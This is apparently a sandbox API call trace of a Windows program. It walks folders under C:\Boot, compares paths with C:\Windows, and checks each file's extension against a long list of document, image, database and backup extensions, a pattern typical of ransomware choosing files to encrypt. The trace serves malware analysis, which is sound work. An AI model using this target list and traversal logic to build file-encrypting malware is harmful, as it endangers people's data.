	[0032.890] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.891] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.891] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.891] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.891] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.891] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1
	[0032.994] lstrlenW (lpString="C:\\Boot\\pt-BR") returned 13
	[0032.994] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot\\pt-BR") returned 1
	[0032.994] lstrlenW (lpString="pt-BR") returned 5
	[0032.994] lstrcmpiW (lpString1="C:\\Windows", lpString2="pt-BR") returned -1
	[0032.994] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.994] lstrlenW (lpString="C:\\Boot\\pt-BR") returned 13
	[0032.994] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb4300c8
	[0032.995] FindNextFileW (in: hFindFile=0xb4300c8, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.995] FindNextFileW (in: hFindFile=0xb4300c8, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.995] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0032.995] lstrlenW (lpString=".1cd") returned 4
	[0032.995] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0032.995] lstrlenW (lpString=".3ds") returned 4
	[0032.995] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1
	[0032.995] lstrlenW (lpString=".3fr") returned 4
	[0032.996] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".3g2") returned 4
	[0032.996] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".3gp") returned 4
	[0032.996] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".7z") returned 3
	[0032.996] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0032.996] lstrlenW (lpString=".accda") returned 6
	[0032.996] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".accdb") returned 6
	[0032.996] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".accdc") returned 6
	[0032.996] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".accde") returned 6
	[0032.996] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".accdt") returned 6
	[0032.996] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".accdw") returned 6
	[0032.996] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1
	[0032.996] lstrlenW (lpString=".adb") returned 4
	[0032.996] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".adp") returned 4
	[0032.996] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai") returned 3
	[0032.996] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1
	[0032.996] lstrlenW (lpString=".ai3") returned 4
	[0032.996] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai4") returned 4
	[0032.996] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai5") returned 4
	[0032.996] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai6") returned 4
	[0032.996] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai7") returned 4
	[0032.996] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1
	[0032.996] lstrlenW (lpString=".ai8") returned 4
	[0032.997] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".anim") returned 5
	[0032.997] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1
	[0032.997] lstrlenW (lpString=".arw") returned 4
	[0032.997] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".as") returned 3
	[0032.997] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1
	[0032.997] lstrlenW (lpString=".asa") returned 4
	[0032.997] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".asc") returned 4
	[0032.997] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".ascx") returned 5
	[0032.997] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1
	[0032.997] lstrlenW (lpString=".asm") returned 4
	[0032.997] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".asmx") returned 5
	[0032.997] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1
	[0032.997] lstrlenW (lpString=".asp") returned 4
	[0032.997] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".aspx") returned 5
	[0032.997] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1
	[0032.997] lstrlenW (lpString=".asr") returned 4
	[0032.997] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".asx") returned 4
	[0032.997] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".avi") returned 4
	[0032.997] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".avs") returned 4
	[0032.997] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".backup") returned 7
	[0032.997] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1
	[0032.997] lstrlenW (lpString=".bak") returned 4
	[0032.997] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1
	[0032.997] lstrlenW (lpString=".bay") returned 4
	[0032.997] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".bd") returned 3
	[0032.998] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1
	[0032.998] lstrlenW (lpString=".bin") returned 4
	[0032.998] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".bmp") returned 4
	[0032.998] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".bz2") returned 4
	[0032.998] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".c") returned 2
	[0032.998] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1
	[0032.998] lstrlenW (lpString=".cdr") returned 4
	[0032.998] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".cer") returned 4
	[0032.998] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".cf") returned 3
	[0032.998] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1
	[0032.998] lstrlenW (lpString=".cfc") returned 4
	[0032.998] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".cfm") returned 4
	[0032.998] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".cfml") returned 5
	[0032.998] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1
	[0032.998] lstrlenW (lpString=".cfu") returned 4
	[0032.998] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".chm") returned 4
	[0032.998] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".cin") returned 4
	[0032.998] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".class") returned 6
	[0032.998] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1
	[0032.998] lstrlenW (lpString=".clx") returned 4
	[0032.998] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1
	[0032.998] lstrlenW (lpString=".config") returned 7
	[0032.998] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1
	[0032.998] lstrlenW (lpString=".cpp") returned 4
	[0032.998] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".cr2") returned 4
	[0032.999] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".crt") returned 4
	[0032.999] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".crw") returned 4
	[0032.999] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".cs") returned 3
	[0032.999] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1
	[0032.999] lstrlenW (lpString=".css") returned 4
	[0032.999] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".csv") returned 4
	[0032.999] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".cub") returned 4
	[0032.999] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dae") returned 4
	[0032.999] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dat") returned 4
	[0032.999] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".db") returned 3
	[0032.999] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1
	[0032.999] lstrlenW (lpString=".dbf") returned 4
	[0032.999] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dbx") returned 4
	[0032.999] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dc3") returned 4
	[0032.999] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dcm") returned 4
	[0032.999] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dcr") returned 4
	[0032.999] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".der") returned 4
	[0032.999] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dib") returned 4
	[0032.999] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1
	[0032.999] lstrlenW (lpString=".dic") returned 4
	[0032.999] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".dif") returned 4
	[0033.000] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".divx") returned 5
	[0033.000] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".djvu") returned 5
	[0033.000] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".dng") returned 4
	[0033.000] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".doc") returned 4
	[0033.000] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".docm") returned 5
	[0033.000] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".docx") returned 5
	[0033.000] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".dot") returned 4
	[0033.000] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".dotm") returned 5
	[0033.000] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".dotx") returned 5
	[0033.000] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1
	[0033.000] lstrlenW (lpString=".dpx") returned 4
	[0033.000] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".dqy") returned 4
	[0033.000] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".dsn") returned 4
	[0033.000] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1
	[0033.000] lstrlenW (lpString=".dt") returned 3
	[0033.000] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1
	[0033.000] lstrlenW (lpString=".dtd") returned 4
	[0033.001] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".dwg") returned 4
	[0033.001] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".dwt") returned 4
	[0033.001] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".dx") returned 3
	[0033.001] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1
	[0033.001] lstrlenW (lpString=".dxf") returned 4
	[0033.001] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".edml") returned 5
	[0033.001] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1
	[0033.001] lstrlenW (lpString=".efd") returned 4
	[0033.001] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".elf") returned 4
	[0033.001] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".emf") returned 4
	[0033.001] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".emz") returned 4
	[0033.001] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".epf") returned 4
	[0033.001] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".eps") returned 4
	[0033.001] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".epsf") returned 5
	[0033.001] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1
	[0033.001] lstrlenW (lpString=".epsp") returned 5
	[0033.001] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1
	[0033.001] lstrlenW (lpString=".erf") returned 4
	[0033.001] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".exr") returned 4
	[0033.001] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".f4v") returned 4
	[0033.001] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1
	[0033.001] lstrlenW (lpString=".fido") returned 5
	[0033.001] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1
	[0033.001] lstrlenW (lpString=".flm") returned 4
	[0033.002] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".flv") returned 4
	[0033.002] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".frm") returned 4
	[0033.002] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".fxg") returned 4
	[0033.002] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".geo") returned 4
	[0033.002] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".gif") returned 4
	[0033.002] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".grs") returned 4
	[0033.002] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".gz") returned 3
	[0033.002] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1
	[0033.002] lstrlenW (lpString=".h") returned 2
	[0033.002] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1
	[0033.002] lstrlenW (lpString=".hdr") returned 4
	[0033.002] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".hpp") returned 4
	[0033.002] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".hta") returned 4
	[0033.002] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".htc") returned 4
	[0033.002] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".htm") returned 4
	[0033.002] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".html") returned 5
	[0033.002] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1
	[0033.002] lstrlenW (lpString=".icb") returned 4
	[0033.002] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".ics") returned 4
	[0033.002] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1
	[0033.002] lstrlenW (lpString=".iff") returned 4
	[0033.002] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1
	[0033.003] lstrlenW (lpString=".inc") returned 4
	[0033.003] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1
	[0033.004] lstrlenW (lpString=".indd") returned 5
	[0033.004] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1
	[0033.004] lstrlenW (lpString=".ini") returned 4
	[0033.004] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1
	[0033.004] lstrlenW (lpString=".iqy") returned 4
	[0033.004] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1
	[0033.004] lstrlenW (lpString=".j2c") returned 4
	[0033.004] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".j2k") returned 4
	[0033.005] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".java") returned 5
	[0033.005] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1
	[0033.005] lstrlenW (lpString=".jp2") returned 4
	[0033.005] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".jpc") returned 4
	[0033.005] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".jpe") returned 4
	[0033.005] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".jpeg") returned 5
	[0033.005] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1
	[0033.005] lstrlenW (lpString=".jpf") returned 4
	[0033.005] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".jpg") returned 4
	[0033.005] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".jpx") returned 4
	[0033.005] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".js") returned 3
	[0033.005] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1
	[0033.005] lstrlenW (lpString=".jsf") returned 4
	[0033.005] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".json") returned 5
	[0033.005] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1
	[0033.005] lstrlenW (lpString=".jsp") returned 4
	[0033.005] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".kdc") returned 4
	[0033.005] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".kmz") returned 4
	[0033.005] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".kwm") returned 4
	[0033.005] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1
	[0033.005] lstrlenW (lpString=".lasso") returned 6
	[0033.006] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1
	[0033.006] lstrlenW (lpString=".lbi") returned 4
	[0033.006] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".lgf") returned 4
	[0033.006] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".lgp") returned 4
	[0033.006] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".log") returned 4
	[0033.006] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".m1v") returned 4
	[0033.006] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".m4a") returned 4
	[0033.006] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".m4v") returned 4
	[0033.006] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".max") returned 4
	[0033.006] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".md") returned 3
	[0033.006] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1
	[0033.006] lstrlenW (lpString=".mda") returned 4
	[0033.006] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mdb") returned 4
	[0033.006] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mde") returned 4
	[0033.006] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mdf") returned 4
	[0033.006] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mdw") returned 4
	[0033.006] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mef") returned 4
	[0033.006] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mft") returned 4
	[0033.006] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mfw") returned 4
	[0033.006] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1
	[0033.006] lstrlenW (lpString=".mht") returned 4
	[0033.007] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mhtml") returned 6
	[0033.007] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1
	[0033.007] lstrlenW (lpString=".mka") returned 4
	[0033.007] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mkidx") returned 6
	[0033.007] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1
	[0033.007] lstrlenW (lpString=".mkv") returned 4
	[0033.007] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mos") returned 4
	[0033.007] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mov") returned 4
	[0033.007] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mp3") returned 4
	[0033.007] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mp4") returned 4
	[0033.007] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mpeg") returned 5
	[0033.007] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1
	[0033.007] lstrlenW (lpString=".mpg") returned 4
	[0033.007] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mpv") returned 4
	[0033.007] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mrw") returned 4
	[0033.007] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".msg") returned 4
	[0033.007] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1
	[0033.007] lstrlenW (lpString=".mxl") returned 4
	[0033.007] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1
	[0033.007] lstrlenW (lpString=".myd") returned 4
	[0033.007] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1
	[0033.007] lstrlenW (lpString=".myi") returned 4
	[0033.007] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1
	[0033.007] lstrlenW (lpString=".nef") returned 4
	[0033.007] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1
	[0033.007] lstrlenW (lpString=".nrw") returned 4
	[0033.008] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".obj") returned 4
	[0033.008] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1
	[0033.008] lstrlenW (lpString=".odb") returned 4
